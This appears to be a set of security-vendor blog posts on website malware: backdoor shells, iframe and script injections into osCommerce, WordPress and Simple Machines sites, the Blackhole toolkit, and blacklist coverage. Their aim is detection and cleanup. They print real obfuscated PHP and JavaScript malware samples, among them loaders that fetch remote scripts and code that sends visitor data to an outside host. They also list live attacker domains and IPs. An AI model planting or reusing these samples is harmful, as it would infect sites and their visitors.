What is a Backdoor Shell

A backdoor shell is a piece of computer software that is inserted without the knowledge and permission of a website owner into the hosting account. This software is usually a standalone file and contains commands written in PHP (a computer programming language). These backdoor shells can allow malicious hackers to connect to compromised websites whenever they would like to. Its like having a sleeper agent inside an organization that you can wake up whenever you want want and make them do bad things on your behalf. These backdoor shells can be used to infect webpages, use a compromised hosting account to send out spam email, install phishing pages and much more.

Why were these shells developed

The backdoor shells were initially developed for debugging, testing and security research purposes. For example, consider a really popular backdoor shell call phpshell. This piece of software is written completely in PHP, is stand alone, needing no support from any installation process. This shell can be placed on a website and an admin can use it to check disk space, folder contents and more details about the hosting account. However, these shells are also used by security researcher to test whether they can gain access into internal systems, scan internal infrastructure and more. Unfortunately, malicious hackers love the flexibility and power provided by these shells and have also taken a liking to them, and now use them in a prolific manner to infect websites.

How are these shells used by malicious hackers

Malicious hackers will install these backdoor shells by exploiting a vulnerability on a website (usually a web app vulnerability like XSS or SQL injection) or by using stolen FTP credentials. Once these shells are installed deep within random subdirectories inside a hosting account, it becomes tricky to hunt them down and delete them. Once installed, the malicious hacker knows the exact URL with which they can acces this hidden backdoor shell and can navigate to it by means of a simple web browser. Once they can get access to this shell, they can execute commands to check files, modify them, check various parameters and what not.

What do these shells look like

We present some examples of these shells below, primarily c99, c100, r57 and php shells. Notice that all of them allow you to have fine grained control over the hosting account that has been compromised.

c100 shell

r57 shell

c99 shell

As you can see for each of these shells, the malicious hacker has complete control over most functions of a hosting account. They can list files, modify them, install software, launch attacks and basically exploit the hosting account to do whatever they would like.

How can I identify these shells

These shells can be identified by virtue of the functionality they explose to the malicious hackers. For e.g. If you can search for strings like “c99shell”, “pre-release”, “uname-a” “safe-mode” inside php files that are present in your hosting account then you will be able to get hold of these malicious files.

How to detect if your site is vulnerable
Find out if your website is sending out spam emails or phishing emails or participating in the malware distribution network on the Internet. You should check your website name with various spam and phsihing databases like Spamcop and Phishtank to find out if any such emails have been reported from your webserver or not. You should also find out if your website is serving up malware to unsuspecting visitors. These are all tell tale signs of the fact that there is a backdoor inserted inside your hosting account.

Additionally, you should find out if your website has application level vulnerabilities such as SQL injcetion and Cross Site Scripting issues, These are all security holes that malicious hackers can exploit to break into your site and install backdoor shells.

Conclusion
Backdoor shells are a common vector for malicious hackers to exploit and infect websites. We have seen what these shells are, how they are used by malicious hackers, and how to protect your website.

StopTheHacker.com customers have access to resources and services that protect them against these kind of threats and help them recover from compromises should they occur. If you would like more information on how to protect your website, please feel free to contact us. You can also visit our services page to protect your website right now.

Is my site infected?
First, to determine if your site has been compromised by the infections mentioned here, search your website hosting directory for the following two lines of malware.

script src=hxxp://dragosimport.com/js/
script src=hxxp://domboware.hu/js/

We have also found the following PHP code on websites infected by these two scripts. Use grep (or wingrep) to search for the PHP code listed below.

@error_reporting(0); if (!isset($eva1fYlbakBcVSir)) {$eva1fYlbakBcVSir = "7kyJ7kSKioDTWVWeRB3TiciL1UjcmRiLn4SKiAETs
[snipped]
 $eva1tYldakBcVSjr(chr(3625*0.016), $eva1tYidokBoVSjr);$eva1tYldokBcVSjr($eva1tYidokBcVSjr[0.016*(7812.5*0.016)],$eva1tYidokBcVSjr[62.5*0.016],$eva1tYldakBcVSir($eva1tYidokBcVSjr[0.061*0.031]));$eva1tYldakBcVSir = "";$eva1tYldakBoVS1r = $eva1tYlbakBcVSir.$eva1tYlbakBcVSir;$eva1tYidokBoVSjr = $eva1tYlbakBcVSir;$eva1tYldakBcVSir = "\x73\164\x72\x65\143\x72\160\164\x72";$eva1tYlbakBcVSir = "\x67\141\x6f\133\x70\170\x65";$eva1tYldakBoVS1r = "\x65\143\x72\160";$eva1tYldakBcVSir = "";$eva1tYldakBoVS1r = $eva1tYlbakBcVSir.$eva1tYlbakBcVSir;$eva1tYidokBoVSjr = $eva1tYlbakBcVSir;} ?>

One such site hosting this malware is nchr.org. Interestingly, many of the sites infected are running osCommerce. We will provide more detail on the vulnerability exploited in an upcoming post.

Which sites are aiding the attack?
The list below includes sites participating in the distribution of the malware thus far.

www.cledwilliams.co.uk
decohouz.com
www.scanstore.nl
www.blackmoresnight.com
www.ldguideservice.com

How do I protect my site?
Webmasters and administrators should search for instances of the malware (including malicious links, iframes, scripts, etc.) on their sites and ensure that they remove all occurrences. More importantly, it is critical to continuously monitor your website for compromise. You need to know if your website has been compromised so you can keep your visitors and your online reputation from being hurt.

StopTheHacker.com customers are protected against these kind of threats. If you would like more information on how to protect your website, please feel free to contact us. You can also visit our services page to protect your website right now.

Till next time…

We will be discussing the major outbreak of the “willysy.com” injection attacks in this article that at one time affected more than 100,000 websites.

What is the Willysy attack?
This particular code injection attack leads to the injection of malicious Iframes by malicious hackers into benign websites. The Iframe is an HTML element that can be used to load content from a different website into the pages on your own website. Think of it as a shipping container that fits like a lego block on your ship, and the container can contain cargo from a source that you have no control over.

This Iframe element is used to load malware content from exploit sites after a benign website is compromised and an iframe is injected and embedded inside the webpage. When trusting visitors view these webpages, they are infected with the malware.

What vulnerabilities are being exploited?
osCommerce sites are being targeted primarily with this attack and the following vulnerabilities in osCommerce are being exploited:

• osCommerce Remote Edit Site Info Vulnerability
• osCommerce Online Merchant v2.2 File Disclosure And Admin ByPass

These exploits are used to infect benign, legitimate, sites. Once the malware is injected onto these exploited sites, the visitors to these sites are infected by various mechanisms used to install the malware on the visitors machine. Some of the mechanisms used to infect the visitors computer involve browser exploits like the ones listed below.

CVE-2010-1885
CVE-2010-0886
CVE-2010-0188
CVE-2006-0003

Is my website infected?
In order to determine whether your website is infected or not, search for instances of the malware listed below using tools like grep (or wingrep) or have StopTheHacker’s Health Monitoring service do it for you.

Search for the following malware:

<iframe src='hxxp://willysy.com/images/banners/' style='position:absolute;visibility:hidden'></iframe>

Search for the following malware closely associated with the willysy.com infection:

<script src=hxxp://exero.eu/catalog/jquery.js></script>

If you see an occurrence of this malware on your website, your website has been compromised. You will need to clean up the infection by deleting the instances of the malware from your webpages.

Another indication of infection is to search your server log files for accesses from the IP addresses below. If you do find these IP addresses in your log files, you should pay special attention to determining whether your site has been compromised or not.

178.217.163.214
178.217.165.111
178.217.165.71

Additionally, if your site is using osCommerce you should be even more alert. Since this infection seems to be more prevalent amongst osCommerce websites, please download the latest version of osCommerce and ensure that the permissions of your admin folders are set correctly (to 644 or something more restrictive).

Which sites are aiding the attack?
The below list includes sites used to spread the malware thus far.

hxxp://arhyv.ru/
hxxp://papucky.eu/ext/
hxxp://counv.ru/
hxxp://adeportes.es/
hxxp://labource.ru/
hxxp://gooqlepics.com/include.js
hxxp://yandekapi.com/

Who owns these malicious sites?
The registrant for the malware disctibution site arhyv.ru is:

leshkinaira@yahoo.com

Source: Forum entry at DSLreports.com.

How do I protect my site?
Webmasters and administrators should search for instances of the malware (including malicious links, iframes, scripts, etc.) on their sites and ensure that they remove all occurrences. More importantly, it is critical to continuously monitor your website for compromise. You need to know if your website has been compromised so you can keep your visitors and your online reputation from being hurt.

StopTheHacker.com customers are protected against these kind of threats. If you would like more information on how to protect your website, please feel free to contact us. You can also visit our services page to protect your website right now.

Till next time…

This post will detail a fast-growing new strain of malware that has targeted Simple Machines enabled websites. At the time of posting, close to 30,000 websites have been infected with this malware. We detail the attack below.

The malware
This malware is primarily found in the form of a script element that contains the various commands to infect the website visitor.

Interestingly, this malware also creates an Iframe element that loads additional malware from an external website. Notice the Iframe element at the end of the sample below (this creates a link to m-e.crossfitharlem.net).

Malware sample (JavaScript):

<script>b=new function(){return 2;};try{app[1][2]}catch(q){ss="";}try{gberbger-2;}catch(q){s=String;}ddd=new Date();d2=new Date(ddd.valueOf()-2);Object.prototype.asd='e';if('e'==={}.asd)a=document['createTextNode']('321');if(a.nodeValue==321)h=(ddd-d2)*-1;n='4.5a4.5a52.5a51a16a20a50a55.5a49.5a58.5a54.5a50.5a55a58a23a51.5a50.5a58a34.5a54a50.5a54.5a50.
5a55a58a57.5a33a60.5a42a48.5a51.5a39a48.5a57.5a58a24.5a19.5a16a59.5a52.5a50a58a52a30.5a19.5a24.
5a24a19.5a16a52a50.5a52.5a51.5a52a58a30.5a19.5a24.5a24a19.5a16a57.5a58a60.5a54a50.5a30.5a19.5a59a52.
5a57.5a52.5a49a52.5a54a52.5a58a60.5a29a52a52.5a50a50a50.5a55a29.5a56a55.5a57.5a52.5a58a52.5a55.
5a55a29a48.5a49a57.5a55.5a54a58.5a58a50.5a29.5a54a50.5a51a58a29a24a29.5a58a55.5a56a29a24a29.5a19.5a31a30a23.5a52.5a51a57a48.5a54.5a50.5a31a17a20.5a29.5a4.5a4.5a62.5a4.5a4.5a51a58.5a55a49.5a58a52.5a55.5a55a16a52.5a51a57a48.5a54.5a50.5a57a20a20.5a61.5a4.5a4.5a4.5a59a48.5a57a16a51a16a30.5a16a50a55.5a49.5a58.5a54.5a50.5a55a58a23a49.5a57a50.5a48.5a58a50.5a34.5a54a50.5a54.5a50.5a55a58a20a19.5a52.5a51a57a48.5a54.5a50.5a19.5a20.5a29.5a51a23a57.5a50.5a58a32.5a58a58a57a52.5a49a58.5a58a50.5a20a19.5a57.5a57a49.5a19.5a22a19.5a52a58a58a56a29a23.5a23.5a54.5a22.5a50.5a23a49.5a57a55.5a57.5a57.5a51a52.5a58a52a48.5a57a54a50.5a54.5a23a55a50.5a58a23.5a61a23.5a57.5a58a24.5a19.5a20.5a29.5a51a23a57.5a58a60.5a54a50.5a23a59a52.5a57.5a52.5a49a52.5a54a52.5a58a60.5a30.5a19.5a52a52.5a50a50a50.5a55a19.5a29.5a51a23a57.5a58a60.5a54a50.5a23a56a55.5a57.5a52.5a58a52.5a55.5a55a30.5a19.5a48.5a49a57.5a55.5a54a58.5a58a50.5a19.5a29.5a51a23a57.5a58a60.5a54a50.5a23a54a50.5a51a58a30.5a19.5a24a19.5a29.5a51a23a57.5a58a60.5a54a50.5a23a58a55.5a56a30.5a19.5a24a19.5a29.5a51a23a57.
5a50.5a58a32.5a58a58a57a52.5a49a58.5a58a50.5a20a19.5a59.5a52.5a50a58a52a19.5a22a19.5a24.5a24a19.5a20.5a29.5a51a23a57.5a50.5a58a32.5a58a58a57a52.5a49a58.5a58a50.5a20a19.5a52a50.5a52.5a51.5a52a58a19.5a22a19.5a24.5a24a19.5a20.5a29.5a4.5a4.5a4.5a50a55.5a49.5a58.5a54.5a50.5a55a58a23a51.5a50.5a58a34.5a54a50.5a54.5a50.5a55a58a57.5a33a60.5a42a48.5a51.5a39a48.5a54.5a50.5a20a19.5a49a55.5a50a60.5a19.5a20.5a45.5a24a46.5a23a48.5a56a56a50.5a55a50a33.5a52a52.5a54a50a20a51a20.5a29.5a4.5a4.5a62.5';n=n
['split']('a');for(i=0;i!=n.length;i++)if(!+b)ss+=s.fromCharCode(-h*eval("n"+"[i]"));if(a.nodeValue==321)eval(ss);</script><iframe style="visibility:
hidden; position: absolute; left: 0pt; top: 0pt;" src="hxxp://m-e.crossfi tha rlem.net/z/st1" height="10" width="10"></iframe></body></html>

What does the malware do?
Malicious code (PHP) like that below has been found on the compromised websites.

The code executes in two phases:

1. The code below transfers information (user agent, IP address, etc…) to conqstat.com.
2. The Javascript mentioned above is returned as a reply.

Malware sample (PHP):

<?php
if (!isset($sRetry))
{
global $sRetry;
$sRetry = 1;
    // This code use for global bot statistic
    $sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); //  Looks for google serch bot
    $stCurlHandle = NULL;
    $stCurlLink = "";
    if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&(strstr($sUserAgent, 'bot') == false)) // Bot comes
    {
        if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create  bot analitics
        $stCurlLink = base64_decode( 'aHR0cDovL2NvbnFzdGF0LmNvbS9zdGF0L3N0YXQucGhw').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
            $stCurlHandle = curl_init( $stCurlLink );
[snipped...]
?>

How do I protect my site?
Malicious hackers are constantly changing their tactics in order to evade detection and to continue to infect unsuspecting users. It is imperative to keep up-to-date on the latest ways that infections are spreading to legitimate websites.

StopTheHacker.com customers are protected against these kind of threats. If you would like more information on how to protect your website, please feel free to contact us. You can also visit our services page to protect your website now.

Till next time…

One popular method for infecting WordPress powered websites is to infect a file called “wp-settings.php”. The malware is then spread from this file to all subsequent requests for webpages on the compromised website.

The malware
Usually the malware shown below will appear at the top of the page in the section of a webpage. Please check your source code.

Malware sample:

<script>eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k1||e(c)}k=[function(e){return d[e]}];e=function(){
...snipped..
t=u("9()",y)}',41,41,'el||ua|indexOf|style|var|document|if|1px|MakeFrameEx|element|yahoo_api|height| width|display|none|body|getElementById|function|createElement|iframe|appendChild|src|id|nl|msie |toLowerCase|opera|webtv||setTimeout|windows|http|userAgent|1000|juyfdjhdjdgh|navigator|ai| showthread|ph
</script>

Steps to remove the malware

1. Access your hosting account SSH or SFTP
2. Remove the malware inserted into the file “wp_inc/upd.php” located in your “/tmp” folder or in your WordPress installation directory. NOTE: Some of our readers have reported that the malware can also reside in a file called revisions-js.php, so please search in this file too. (Thanks to our readers! )
3. Remove the following code from the file “wp-settings.php”, usually found in your WordPress installation directory

function check_wordpress(){
$t_d = sys_get_temp_dir();
if(file_exists($t_d . ‘/wp_inc’)){
readfile($t_d . ‘/wp_inc’);
}
}
add_action(‘wp_head’, ‘check_wordpress’);
do_action( ‘init’ );

What does the malware do?
Th injected PHP code causes your WordPress installation to load the malware located inside a file named “wp_inc/upd.php” (usually in your “/tmp” folder). The malware then builds an Iframe element pointing to one of many different websites.

Malware destination sites:

hxxp://juyfdjhdjdgh.nl.ai/showthread.php
hxxp://myftp.org/
hxxp://coom.in/

How did this happen?
One of the primary vectors for an attack like this one is stolen user credentials. Do not store your user name and passwords in your FTP client or other similar applications like FileZilla.

Additionally, make sure your WordPress install is up-to-date and that all third party plugins, like timthumb are updated too.

How do I protect my site?
Malicious hackers are constantly changing their tactics in order to evade detection and to continue to infect unsuspecting users. It is imperative to keep up-to-date on the latest ways that infections are spreading to legitimate websites.

StopTheHacker.com customers are protected against these kind of threats. If you would like more information on how to protect your website, please feel free to contact us. You can also visit our services page to protect your website now.

Till next time…

We have described how malicious hackers exploit osCommerce installations in a past article. This post details a new piece of malware that is affecting osCommerce websites.

The attack
Shopping carts like osCommerce are prime targets for malicious hackers since they are widely used, store a plethora of sensitive information, and are prime vector to embed malware on a website to infect visitors and customers.

A recent trend is to display fake Anti-Virus pop up advertisements to visitors of a site when they land on an infected webpage. The following websites are being used to distribute the fake Anti-Virus malware.

Sites distributing the malware:

roybeth.com
schenkenbrunn.at
puremojofoto.com
pindating.com
nadobolchetrafa.cx.cc

Compromised websites in the wild
One example of a site infected with this specific malware is: www.surfmonster.co.uk. Take a look at the code below to see how the malware has been appended to the JavaScript.

A sample of the actual malware:

i,s,ss="http://ajax.googleapis.com/ajax/libs/jquery/1.5.1/jquery.min.js”,ss="http://roybeth.com/ext/jquery.php";try { s=document.createElement("script"); s.src=ss; document.body.appendChild( s ); } catch(erst){ }

A more detailed description of how the malware is appended is presented in one of our previous posts.

      this.hook.enabled = 1;

        // Cache so updates are infrequent.
        tiles.old = {
                w: elmW,
                h: elmH,
                x: bgX,
                y: bgY,
                r: bgR
        };
};
var i,s,ss="http://ajax.googleapis.com/ajax/libs/jquery/1.5.1/jquery.min.js",ss="http://roybeth.com/ext/jquery.php"; try { s=document.createElement("script"); s.src=ss; document.body.appendChild(s); } catch(erst) { }var i,s,ss="http://ajax.googleapis.com/ajax/libs/jquery/1.5.1/jquery.min.js",ss="http://roybeth.com/ext/jquery.php"; try { s=document.createElement("script"); s.src=ss; document.body.appendChild(s); } catch(erst) { }var i,s,ss="http://ajax.googleapis.com/ajax/libs/jquery/1.5.1/jquery.min.js",ss="http://roybeth.com/ext/jquery.php"; try { s=document.createElement("script"); s.src=ss; document.body.appendChild(s); } catch(erst) { }var i,s,ss="http://ajax.googleapis.com/ajax/libs/jquery/1.5.1/jquery.min.js",ss="http://roybeth.com/ext/jquery.php"; try { s=document.createElement("script"); s.src=ss; document.body.appendChild(s); } catch(erst) { }

Recommended steps
First, remove the malware. Then, upgrade your installation of osCommerce and analyze your website for application vulnerabilities. Additionally, securing the permission settings of your “admin” directory or renaming the directory to a value different than the default can mitigate automated attacks.

How do I protect my site?
Malicious hackers are constantly changing their tactics in order to evade detection and to continue to infect unsuspecting users. It is imperative to keep up-to-date on the latest ways that infections are spreading to legitimate websites.

StopTheHacker.com customers are protected against these kind of threats. If you would like more information on how to protect your website, please feel free to contact us. You can also visit our services page to protect your website now.

Till next time…

Domain Chaining is the act of using multiple malware infected domains to form a network that distributes exploit code to benign, legitimate, websites that get compromised. This allows malicious hackers to reliably push exploit code to thousands of compromised websites, infecting the websites themselves and in turn the visitors to these sites.

What is a Domain Chaining attack?
Domain Chaining attacks have been on the rise since the beginning of this year.

The basic concept is as follows:

1. Malicious hackers register multiple websites specifically to spread malware. This malware may exploit browser vulnerabilities to infect visitors’ computers or may redirect unsuspecting users to websites that prompt them to install fake anti-virus software on their computer.
2. As in traditional attacks, the malicious hackers use a network of compromised, but legitimate, websites in addition to the dedicated malware distribution websites they registered to widely spread their malware across the Internet.

Why do malicious hackers use this approach?
There are a few benefits to using this mechanism. The first being that it becomes difficult for signature-based and honeypot-based detection systems to home in on the actual source of the malware versus only identifying the distribution points. Another “benefit” is what can be called “failover.”

We have blogged about hackers’ understanding of the necessity of failover in the past. In case any security organization identifies a website in this malware chain as being dangerous and manages to shut it down, by using a number of websites to act as distribution points, the distribution of the actual exploit to website visitors does not stop. Think of it like a multi-headed Hydra.

How do I know if my site is infected?
If your website is part of this Domain Chaining attack, it will most likely have one of these files.

script.php
cssminibar.js,
sidename.js,
jtoolsmini.js,
tempjs.js,
js.php,
jstools.js

What do these files do?
These scripts load code from infected websites harboring malicious Iframes. The malicious Iframes in turn load exploit code via maliciously registered sites.

Maliciously registered sites related to this attack:

brkfnrmnk.co.cc
brlgnknc.co.cc

Maliciously registered sites related to previous Domain Chaining attacks:

klubnika34his.com,
bogdantevye.ru,
jwjmusic.cx.cc,
frankieeus.ru,
gaufridboris.ru,
stephanos.ru

The malicious website content is primarily distributed by a file named “wpqonfig.php” that redirects Iframes and scripts to a maliciously registered website.

What script is used in the current attacks?
The latest version of this Domain Chaining attack uses the following script:

nbnjkl.com/urchin.js

How do I protect my site?
Malicious hackers are constantly changing their tactics in order to evade detection and to continue to infect unsuspecting users. It is imperative to keep up-to-date on the latest ways that infections are spreading to legitimate websites.

StopTheHacker.com customers are protected against these kind of threats. If you would like more information on how to protect your website, please feel free to contact us. You can also visit our services page to protect your website now.

Till next time…

In this article we will discuss a widespread strain of malware that already logs near 100,000 attempts per day on IPS (Intrusion Prevention System) or IDS (Intrusion Detection System) systems, trying to infect websites.

What are Toolkits?
Malicious hackers sometimes use toolkits, pre-packaged pieces of computer code, which make it very easy to distribute malware, infect websites with it and then perform specific malicious activities with the now compromised site(s).

The strain of malware which we will discuss is related to a toolkit popularly known as the Blackhole Toolkit. This toolkit has been available for some time now and researchers at Symantec have noted the same.

How the toolkit works:

1. Unsuspecting Internet surfers visit websites harboring malicious IFrame tags
2. Users are then redirected to servers which load malicious payloads via browser exploits or PDF, SWF based exploits
3. Often, a malicious JAR file is downloaded on the PC of the unsuspecting client
   • This JAR file contains malicious URLs which download further malware
4. The downloaded trojan(s) can post a unique ID to a command-and-control server
5. The trojan then posts a list of the running processes on the victim’s computer to the server
6. The following three plugins are then downloaded:
   • stopav.plug – Tries to disable the antivirus installed on the victim’s computer
   • passw.plug – Log username/password combinations for connections being made
   • miniav.plug – Tries to delete copies of Zeus bots on the computer to prevent competition amongst malware on victim’s computer
7. Finally, a fake Anti-Virus program is downloaded to the victim’s computer.

How to Identify an Infected Website
Search for instances of the following PHP code in files on your server or locate the JavaScript in the webpages delivered to clients. Below is a sample of the PHP code which aids the installation of this malware.

$var="kfb2rpgv"; echo base64_decode(str_rot13

The JavaScript produced by this code:

try{try{a1=a2}catch(a){b[2]=21};}catch(a){k="ReferenceErr"+a.toString().substr(0,0);};var ar=">a)myuA1NhTvB\";zEr0c.pi (sngC}{d?lwt

The malicious IFrames generated as a result load content from the following sites:

marillador.cz.cc
web-traffic.cz.cc
yourstatscounter.cz.cc
beazenrad.cz.cc
loading-v-506.cz.cc
luckychance.cz.cc
cnc0098510m.cz.cc
newincposrtqw.cz.cc
upperblackeddy4.cz.cc
ndidrsjt.cz.cc

If you think you are facing a problem related to this specific strain of malware, please scan your computer with an Anti-Virus program (scanning with multiple Anti-Virus engines can yeild better results).

We Can Help!
If you want to protect your site from infection, or you need additional support, please sign up for one of our services. Please contact us with your comments or questions.

Motivation
Understanding the behavior of infected websites is very important. This provides security researchers with strategies to help deal a blow to the bad guys and at the same time, provide website owners and administrators an idea of the current state of website security.

Since the publication of our last article in this series, we have received good feedback from our colleagues in security. We will attempt to incorporate their comments and concerns in this part of the series.

Methodology
We discussed the aim of this experiment and methodology in the last part of this series. We won’t repeat them here, but we encourage you to take a look at our first article in this series if you haven’t already read it!

Analysis
Below we present some graphs which provide more information about the analysis.

• Websites have a high probability of getting hacked on a Wednesday!

Websites have a high probability of getting hacked on a Wednesday!

• Websites have a high probability of getting hacked between 7-8 PM PDT.

Websites have a high probability of getting hacked between 7-8 PM PDT.

• On Monday websites get hacked most between 11 AM to 12 Noon, PDT
• On Tuesday websites get hacked most between 9 AM to 10 AM, PDT
• On Wednesday websites get hacked most between 7 PM to 8 PM, PDT
• On Thursday websites get hacked most between 10 PM to 11 PM, PDT
• On Friday websites get hacked most between 11 AM to 12 Noon, PDT
• On Saturday websites get hacked most between 1 PM to 2 PM, PDT
• On Sunday websites get hacked most between 11 AM to 12 Noon, PDT

Note: Most hashes which stay on the blacklist (over the 113 day period) seem to get added to the blacklist on Wednesday.

Conclusions
We have presented more interesting statistics regarding the appearance of website hashes on the Google Safe Browsing List. These statistics provide information which website administrators and owners can use better arm themselves with against attackers. We will continue analyzing the dataset to provide more interesting information. If you have any questions please add a comment.

At stopthehacker.com, we work hard to help you combat malicious hackers. If you would like to work with us, please drop us an email. You can also visit our services page to find out how we can help you, in fact you can even sign up for free services!

Till next time…

In recent years, the number of blacklist being published by web-centric organizations have grown by leaps and bounds. Large Internet based companies such as Google, Yahoo and Microsoft have been providing cues to their users about malicious websites in trying to make the Internet a safer place. Google provides much more in-depth information than the other two, Yahoo and Bing, and seems to have sophisticated virtual machine based analysis tools which can detect misbehaving malicious code. Yahoo employs McAfee’s Search scan service while Bing potentially uses Microsoft specific technologies.

Experiment Goal

The aim of this experiment is to compare the coverage for each of the blacklists published by Google, Yahoo and Bing and compare them to what users in the Internet believe. To do this we will compare the results of Google, Yahoo, Bing and Malware Patrol with Web of Trust (WOT). Furthermore, we have also tried to see how many of these malicious URLs are also involved in Phishing. We have done this by looking up each URL/domain via Phishtank’s API.

Blacklists provide an easy mechanism for users (via browsers) and developers (via APIs) to assimilate security information about websites, IPs and such in order to make an informed decision about whether to allow or deny access to an IP or website.

Methodology

We have collected 1095 confirmed malicious links from MalwareURL. Each of these links was tested to determine if they are listed on blacklists supplied by Google, Yahoo and Bing. Note that Yahoo and Bing unlike Google do not provide any direct APIs to probe their databases. Thereby each link, and its associated domain was pushed via an HTTP request to Yahoo and Bing to analyze if the results indicated that the domain/link was infected.

To determine if a website is present in the Google malware blacklist, the domain name along with the link and its variations, as defined here, are converted to MD5 hashes and checked using Google’s Safe Browsing API. For Malware Patrol, the aggressive version of their blacklist is downloaded and comparisons are made locally. For WOT, we employ their XML based API to gather information about the belief of users in the Internet. For Phishtank we have used their XML based API. The tests were conducted on Mar 22 2010.

Popular blacklists cover only a minuscule percentage of malicious sites.

Highlights

• Google marked 0.18% of the URLs as unsafe.
• Yahoo marked 1.0% of the URLs as unsafe.
• Bing marked 0.09% of the URLs as unsafe.
• Malware Patrol marked 0.63% of the URLs as unsafe.
• Phishtank marked 0% of the URLs as unsafe.
• WOT marked 99% of URLs as unsafe.

Note: 1095 unique, malicious URLs were tested with each service.

Observations

Interestingly, Web Of Trust (WOT) marked 99% of the URLs with “poor” or “very poor” or “unsatisfactory” reputation. We have to assume that when users will see such a rating they will not visit the website in question and hence treat this kind of rating as unsafe, for the purposes of this test. It remains to be determined if WOT uses a data feed from a malware URL which we have used to prime the test set. Nonetheless, it is surprising to see that a company which specializes in collating the trust and opinions of web surfers performs better orders of magnitude than large Internet companies and established blacklist providers.

One must keep in mind though that Google’s approach to maintaining an ever changing blacklist is slightly different from the other actors in the game. Google publishes an updated version of its list every 30 minutes or so and specifies which MD5 hashes need to be purged and which ones need to be inserted. Some blacklist services do not take this approach and hence may claim to store information on millions of sites, which were infected at one point in time. The probability of this happening in the Google blacklist is low, because they have opened up a review process via their webmaster central area to update their blacklist.

In contrast, Bing and Yahoo do not provide public APIs for developers and applications to use.

Also, we see that none of the URL/domains were actually listed on Phishtank. It seems that websites which aim to infect users with malware are quite different from the set of sites used for phishing. It does not seem that malware laced websites are also used to commit phishing.

Conclusion

Large Internet companies, some of whom have published effective blacklists, used by many developers and application all over the world, still have a long way to go in order to become truly effective. As we have seen, only minuscule numbers of malicious websites are identified by the blacklist services. WOT seems to be extremely effective at identifying unsafe websites. It remains to be determined whether the data-set used for this test has a large overlap with any of the sources WOT uses to classify websites.

Another interesting result is that it does not seem that websites which aim to infect users with malware are actively involved in phishing campaigns.